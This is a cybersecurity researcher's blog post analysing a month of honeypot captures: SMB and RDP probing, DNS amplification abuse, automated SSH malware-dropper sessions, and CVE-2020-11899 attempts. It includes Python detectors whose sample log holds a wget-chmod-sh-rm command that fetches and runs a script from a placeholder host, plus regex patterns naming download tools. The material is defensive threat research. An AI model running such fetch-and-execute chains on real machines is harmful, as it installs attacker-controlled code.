
By:
Joaquin Lanfranconi
(Cybersecurity Researcher )


REVISITING THE HONEYPOT

One month after building our honeypot from scratch, designed to analyze attackers, their goals, patterns, and actions, we will look at what it managed to capture: the most targeted services, the vulnerabilities the attackers tried to exploit, and where the attacks came from. The first thing we notice when opening the Kibana visualization panel is the staggering number of attacks on the deployed honeypots. The total number of attacks received approaches 3 million, with 70% originating from just two honeypots, Dionaea and DDoSPot.

If we filter by the source IP addresses from which the attacks originate, we see that a single IP accounts for more than 300,000 attacks on the Dionaea honeypot (the address itself is redacted for security reasons). We cannot determine whether this source IP belongs to the attacker or is just another of the many victims being used as a relay by a cybercriminal.



Most Targeted Services by Attackers

When it comes to services, the most targeted in our honeypot is undoubtedly SMB (port 445/tcp) with over half a million attacks coming from all around the world, as shown in the following graph.



Attackers were looking for publicly shared folders that might contain sensitive information about the organization, in order to download their contents and use them for future attacks or for commercial or extortion purposes. The second most attacked service/port, however, was 53/udp. In this case the attackers were not seeking information but using our infrastructure to launch distributed denial-of-service (DDoS) attacks against other victims. This type of attack is commonly known as DNS amplification DDoS: the attacker sends small queries with the victim's spoofed source address, and the much larger responses are delivered to the victim. Most of the domains queried in these attacks are managed by governments, as they carry the .gov top-level domain (TLD). Some of them are listed below.
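A defender-side check for the amplification pattern described above, added here as an example (it is not the post's own tooling). It aggregates query/response sizes per source address and flags sources that keep receiving answers far larger than their queries; the records are constructed for the example and use a simplified JSON layout rather than DDoSPot's actual log format.

```python
import json
from collections import defaultdict

# Constructed sample records, one per query/response pair answered by an
# Internet-facing resolver (simplified JSON, not DDoSPot's own format).
SAMPLE_LOG = """
{"src_ip": "203.0.113.10", "qname": "example.gov", "qtype": "ANY", "req_bytes": 45, "resp_bytes": 3200}
{"src_ip": "203.0.113.10", "qname": "example.gov", "qtype": "ANY", "req_bytes": 45, "resp_bytes": 3200}
{"src_ip": "203.0.113.10", "qname": "agency.gov", "qtype": "ANY", "req_bytes": 44, "resp_bytes": 2900}
{"src_ip": "203.0.113.10", "qname": "example.gov", "qtype": "ANY", "req_bytes": 45, "resp_bytes": 3200}
{"src_ip": "198.51.100.7", "qname": "www.example.com", "qtype": "A", "req_bytes": 48, "resp_bytes": 64}
{"src_ip": "198.51.100.7", "qname": "mail.example.com", "qtype": "MX", "req_bytes": 49, "resp_bytes": 110}
"""

def amplification_factor(req_bytes, resp_bytes):
    """Bytes delivered to the (spoofed) source per byte it cost the attacker to ask."""
    return resp_bytes / req_bytes

def find_amplification_abuse(log_text, min_factor=10.0, min_queries=3):
    """Aggregate by source IP and flag sources that repeatedly receive answers
    far larger than their queries. In a reflection attack the source address
    is the victim's, so the result names who is being flooded, not the attacker."""
    per_src = defaultdict(lambda: {"queries": 0, "req": 0, "resp": 0,
                                   "qtypes": defaultdict(int), "qnames": set()})
    for line in log_text.strip().splitlines():
        rec = json.loads(line)
        s = per_src[rec["src_ip"]]
        s["queries"] += 1
        s["req"] += rec["req_bytes"]
        s["resp"] += rec["resp_bytes"]
        s["qtypes"][rec["qtype"]] += 1
        s["qnames"].add(rec["qname"])
    flagged = {}
    for ip, s in per_src.items():
        factor = amplification_factor(s["req"], s["resp"])
        if s["queries"] >= min_queries and factor >= min_factor:
            flagged[ip] = {
                "factor": round(factor, 1),
                "queries": s["queries"],
                "top_qtype": max(s["qtypes"], key=s["qtypes"].get),
                "gov_domains": sorted(q for q in s["qnames"] if q.endswith(".gov")),
            }
    return flagged

if __name__ == "__main__":
    for victim, info in find_amplification_abuse(SAMPLE_LOG).items():
        print(victim, info)
```

Because the flagged address is the spoofed victim, the useful response is on the resolver side (not answering recursive queries from the Internet, response rate limiting), not blocking that address.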



The Remote Desktop Protocol is our third most attacked service, recording nearly 500,000 attacks in total. The adversaries are trying to add our server to their botnet. By gaining remote control of the server, they can carry out further attacks, mine cryptocurrencies, use reconnaissance techniques to compromise other assets of the organization, and more. The possibilities are countless.



As mentioned earlier, the connections come from all over the world, making it difficult to determine if we are being attacked by a botnet, a specific actor, or automated scripts searching for this exposed service.



Objectives of the Attacks

Since deploying our honeypot network, we have received thousands of attacks, but one type of behavior prevails: automation. Let's take a closer look at this. To analyze this attack methodology, we will use the logs from the Cowrie honeypot. This honeypot simulates an SSH service (port 22/tcp) and a Telnet service (port 23/tcp). Once the attacker manages to log in to one of these services, they execute a series of concatenated commands, similar to the following:



This removes any previously downloaded file of the same name, downloads a script from one of the servers where the attackers host it and, once it is downloaded, executes it. The content of that downloaded file can be seen below:



This script, in turn, downloads other malicious binaries with different objectives, ranging from using our infrastructure to mine cryptocurrencies and recording every action executed on the victim, to expanding their botnet and increasing their attack power. The files are usually hosted on web servers (port 80/tcp), but we have also seen them downloaded from FTP services (port 21/tcp) using the "anonymous" (guest) user to access the service.



Another technique observed throughout all the attacks is that after downloading a malicious binary and executing it, the same binary is deleted from the system to avoid leaving traces of the executables. We have also seen that some requests to these servers hosting the malicious binaries return an HTTP 404 status code (File Not Found).
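A detector for the download, execute and delete chain described in the Cowrie sessions above, added here as an example (it is not the post's own tooling). It assumes Cowrie's JSON log format with `cowrie.command.input` events and groups commands per session, so a chain typed across several inputs is still caught; the events, URLs and addresses are constructed placeholders.

```python
import json
import re
from collections import defaultdict

# Constructed events in Cowrie's JSON log format (not taken from the post's
# honeypot); the URLs and addresses are documentation-range placeholders.
SAMPLE_EVENTS = """
{"eventid": "cowrie.login.success", "session": "a1", "src_ip": "198.51.100.23", "username": "root"}
{"eventid": "cowrie.command.input", "session": "a1", "src_ip": "198.51.100.23", "input": "cd /tmp; rm -rf bins.sh; wget http://203.0.113.50/bins.sh; chmod 777 bins.sh; sh bins.sh; rm -rf bins.sh"}
{"eventid": "cowrie.command.input", "session": "b2", "src_ip": "198.51.100.24", "input": "wget http://203.0.113.51/x86"}
{"eventid": "cowrie.command.input", "session": "b2", "src_ip": "198.51.100.24", "input": "ls -la"}
{"eventid": "cowrie.command.input", "session": "c3", "src_ip": "198.51.100.25", "input": "uname -a; cat /proc/cpuinfo"}
"""

# One regex per stage of the chain: fetch, mark executable, run, remove traces.
STAGES = {
    "download": re.compile(r"\b(wget|curl|tftp|ftpget)\b"),
    "make_exec": re.compile(r"\bchmod\s+(\+x|[0-7]{3,4})\b"),
    "execute": re.compile(r"(^|[;&|]\s*)(sh|bash|\./\S+)\b"),
    "cleanup": re.compile(r"\brm\s+(-\w+\s+)*\S+"),
}
# Stop at separators so "wget http://host/x;" does not keep the trailing ";".
URL = re.compile(r"(?:https?|ftp)://[^\s;|&]+")

def stages_in(command):
    """Return the names of the chain stages present in one command line."""
    return {name for name, rx in STAGES.items() if rx.search(command)}

def find_download_execute_chains(log_text):
    """Aggregate stages and fetched URLs per session and return only the
    sessions that both downloaded something and executed something."""
    sessions = defaultdict(lambda: {"src_ip": None, "stages": set(), "urls": []})
    for line in log_text.strip().splitlines():
        ev = json.loads(line)
        if ev.get("eventid") != "cowrie.command.input":
            continue
        s = sessions[ev["session"]]
        s["src_ip"] = ev["src_ip"]
        s["stages"] |= stages_in(ev["input"])
        s["urls"] += URL.findall(ev["input"])
    return {sid: s for sid, s in sessions.items()
            if {"download", "execute"} <= s["stages"]}

if __name__ == "__main__":
    for sid, info in find_download_execute_chains(SAMPLE_EVENTS).items():
        print(sid, info["src_ip"], sorted(info["stages"]), info["urls"])
```

The extracted URLs are what you would hand to the hosting provider or check against the HTTP 404 responses mentioned above, since a dead download host means the rest of the chain never ran.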

Most Exploited Known Vulnerabilities

In our Kibana visualization panel, with the help of Suricata, we can see which Common Vulnerabilities and Exposures (CVE) were exploited. One CVE in particular was attempted more than 1,000 times: CVE-2020-11899, a vulnerability in Treck's TCP/IP stack in versions prior to 6.0.1.66.



Furthermore, analyzing the commands used by the attackers, one SSH session contained 1000 identical lines mentioning the phrase "RyM_Gang".



Searching for this phrase in various online resources, we found a GitHub repository containing a series of scripts used for brute-forcing various services (SSH, Telnet, etc.).



Once these scripts manage to gain access to one of the services, they verify that commands can actually be executed by echoing a marker string and then searching the output for that line.

Conclusions

We have confirmed that honeypots are one of the most effective tools in Active Cyber Defense for gathering information about attackers. They allow us to understand, directly and efficiently, the actions of these mostly automated actors and the types of attacks we must deal with daily as defenders. It is worth noting that our cloud service provider sent security alerts to the registered email address, pointing out configuration errors in some of our services and providing guidance on how to fix them. In general, we observed that the attacks we received were mostly automated and aimed at profit with minimal effort, from expanding botnets to using our infrastructure for the attackers' benefit.

In upcoming posts, we will continue exploring more techniques within Active Cyber Defense to enhance the security level of our organization.